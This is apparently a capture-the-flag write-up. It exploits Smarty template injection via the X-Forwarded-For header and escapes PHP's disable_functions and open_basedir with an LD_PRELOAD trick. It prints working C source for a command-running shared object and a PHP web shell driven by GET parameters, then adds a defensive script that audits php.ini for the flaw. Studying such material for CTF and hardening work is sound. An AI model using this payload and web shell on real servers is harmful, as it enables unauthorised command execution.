smart

  • Template injection
  • mail
  • LD_PRELOAD

The bottom of the page shows the word Smarty, so a template injection vulnerability is likely. Testing showed the injection point is the XFF (X-Forwarded-For) header; a webshell is written as follows:

[screenshot: image-20190701135415095]

open_basedir turns out to be restricted to the /var/www/html/tmp directory, and disable_functions is as follows:

[screenshot: image-20190701143905275]

However, mail and putenv are not disabled, so LD_PRELOAD can be used to break out. The C code is as follows:

#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

extern char** environ;

/* Runs automatically when the shared object is loaded via LD_PRELOAD,
 * i.e. inside the sendmail child that mail() spawns. */
__attribute__ ((__constructor__)) void preload (void)
{
    // get the command line from the environment variable set by putenv()
    const char* cmdline = getenv("EVIL_CMDLINE");

    // unset environment variable LD_PRELOAD so the child does not preload again.
    // unsetenv("LD_PRELOAD") has no effect on some distributions (e.g., CentOS),
    // so the entry is blanked in environ directly instead.
    int i;
    for (i = 0; environ[i]; ++i) {
        if (strstr(environ[i], "LD_PRELOAD")) {
            environ[i][0] = '\0';
        }
    }

    // execute the command
    system(cmdline);
}

Save it as bypass_disablefunc.c and compile it on Linux with gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so to produce the .so file. Upload the .so file together with the following PHP:

<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";

// command to run and the file its output is redirected to
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";

// the .so constructor reads EVIL_CMDLINE; LD_PRELOAD makes it load in the sendmail child
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);

// mail() spawns sendmail, which inherits the environment and loads the .so
mail("", "", "","");

// read back the command output and clean up
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>
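The chain above works only because disable_functions left both putenv and a sendmail-spawning function (mail) callable. The following is an added defensive example, not part of the original write-up: it parses a php.ini fragment and reports whether that chain is still open. The ini sample is constructed; the extra spawners listed beside mail (error_log, imap_mail, mb_send_mail) are the other documented functions that invoke sendmail.

```python
"""Audit a php.ini disable_functions value for the putenv + mail LD_PRELOAD chain."""
import re

# putenv sets LD_PRELOAD; each SPAWNER launches sendmail, which then loads the .so.
ENV_SETTERS = {"putenv"}
SPAWNERS = {"mail", "error_log", "imap_mail", "mb_send_mail"}


def parse_disable_functions(ini_text: str) -> set:
    """Return the set of function names disabled in ini_text (last active line wins)."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop ini comments
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip("\"'")
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def ld_preload_chain_open(disabled: set) -> bool:
    """True if putenv and at least one sendmail-spawning function are both callable."""
    return not (ENV_SETTERS & disabled) and bool(SPAWNERS - disabled)


def hardened_value(disabled: set) -> str:
    """disable_functions value that closes the chain while keeping existing entries."""
    return ",".join(sorted(disabled | ENV_SETTERS | SPAWNERS))


# Constructed sample resembling the challenge: exec-style functions disabled,
# open_basedir set, but putenv and mail left enabled.
SAMPLE_INI = """
; disable_functions = nothing   ; commented out, must be ignored
disable_functions = "exec,system,passthru,shell_exec,proc_open,popen,dl"
open_basedir = /var/www/html/tmp
"""

if __name__ == "__main__":
    d = parse_disable_functions(SAMPLE_INI)
    print("LD_PRELOAD chain open:", ld_preload_chain_open(d))
    print("hardened disable_functions =", hardened_value(d))
```

Note that open_basedir does not help here: the command runs in the sendmail child, outside PHP's file-access checks.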

Running it yields the flag:

[screenshot: image-20190701144646396]